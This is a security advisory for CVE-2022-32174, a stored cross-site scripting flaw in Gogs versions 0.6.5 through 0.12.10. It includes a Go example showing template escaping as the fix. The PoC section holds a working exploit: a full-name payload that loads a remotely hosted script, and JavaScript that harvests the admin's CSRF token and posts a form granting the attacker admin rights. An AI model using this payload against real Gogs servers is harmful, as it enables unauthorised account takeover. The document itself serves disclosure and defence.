CVE-2022-32174
Date: October 11, 2022
Overview
In Gogs, versions v0.6.5 through v0.12.10 are vulnerable to Stored Cross-Site Scripting (XSS) that leads to an account takeover.
Details
Gogs is vulnerable to Stored Cross-Site Scripting that leads to an account takeover, in the select assignee component. When an admin selects an assignee from the user list, the malicious JavaScript payload stored in that user's full name executes in the admin's session and allows the attacker to gain admin privileges.
PoC Details
1. Log in as a user, navigate to your settings and change your full name to the XSS payload provided in the PoC 1 section below.
2. Host the JavaScript file whose source code is provided in the PoC 2 section below.
3. Go to the admin's repo and create an issue.
4. Log in as admin and navigate to the issue.
5. Under assignee, select the user with the payload.
6. The malicious JavaScript executes and allows the attacker to gain admin privileges in the application.
PoC Code
// PoC 1 - XSS Payload (set as the user's full name):
user1<script src=http://localhost:8181/xss.js>
// PoC 2 - xss.js (served from the host referenced in PoC 1):
let a = "";
var req = new XMLHttpRequest();
req.onload = handleResponse;
// Load the front page in the admin's session to read the CSRF token out of its markup.
req.open('get', '/', true);
req.send();
function handleResponse() {
    a = (document.documentElement.innerHTML).match(/_csrf" content=".{1,}"/)[0];
    a = a.split("_csrf\" content=\"")[1];
    a = a.split("\"")[0];
    // Submit the admin user-edit form for user id 2 with the harvested token.
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/admin/users/2', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    changeReq.send('_csrf=' + a + '&login_type=0-0&login_name=&full_name=%3Cscript+src%3Dhttp%3A%2F%2Flocalhost%3A8181%2Fxss.js%3E%3C%2Fscript%3E&email=user1%40localhost.com&password=&website=&location=&max_repo_creation=-1&active=on&admin=on&allow_git_hook=on');
}
Affected Environments
Gogs versions v0.6.5 through v0.12.10
Prevention
No Fix
Language: Go
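The Prevention section lists no fix. As an added illustration that is not Gogs' own code or a Gogs patch, the Go program below shows the mitigation class for this bug: a user-controlled full name rendered through html/template, which escapes the value for the HTML context it lands in, beside the same template executed with text/template, which passes the markup through unchanged. The template string, the assignee struct, the user id and the sample full name are assumptions constructed for this example; only the shape of the payload follows the advisory.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"strings"
	texttemplate "text/template"
)

// Constructed sample input (not taken from a real Gogs instance): a full name
// carrying the same shape of payload the advisory describes. The host is a
// placeholder.
const attackerFullName = `user1<script src=http://localhost:8181/xss.js></script>`

// assigneeTmpl is an assumed, simplified stand-in for the markup of one
// assignee dropdown entry; it is not Gogs' own template.
const assigneeTmpl = `<div class="item" data-id="{{.ID}}">{{.FullName}}</div>`

type assignee struct {
	ID       int
	FullName string
}

// renderUnsafe reproduces the flaw class: text/template interpolates the name
// as raw text, so any markup in it reaches the browser unchanged.
func renderUnsafe(a assignee) (string, error) {
	t, err := texttemplate.New("assignee").Parse(assigneeTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, a); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// renderSafe applies the mitigation: html/template escapes the value for the
// HTML-text context it is inserted into, turning "<" into "&lt;" and so on.
func renderSafe(a assignee) (string, error) {
	t, err := template.New("assignee").Parse(assigneeTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, a); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// containsRawScript is the check a reviewer or a regression test runs over
// rendered output: does an unescaped "<script" still appear?
func containsRawScript(markup string) bool {
	return strings.Contains(strings.ToLower(markup), "<script")
}

func main() {
	a := assignee{ID: 2, FullName: attackerFullName}
	for name, render := range map[string]func(assignee) (string, error){
		"text/template (vulnerable)": renderUnsafe,
		"html/template (escaped)":    renderSafe,
	} {
		out, err := render(a)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%s\n  %s\n  raw <script present: %v\n", name, out, containsRawScript(out))
	}
}
```

Run it with `go run` and compare the two outputs: the escaped render keeps the same data-id attribute but the name arrives as `user1&lt;script ...&gt;` text, so containsRawScript reports false. Two practical points follow from the PoC above: the CSRF token does not protect the admin form here, because the injected script runs inside the admin's own session and reads the token from the page, so output encoding at every place a display name is interpolated is the control that matters; and a test like containsRawScript over rendered pages is a cheap regression guard once that encoding is in place.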
Good to know:
| Base Score: | |
|---|---|
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | Low |
| User Interaction (UI): | Required |
| Scope (S): | Changed |
| Confidentiality (C): | High |
| Integrity (I): | High |
| Availability (A): | High |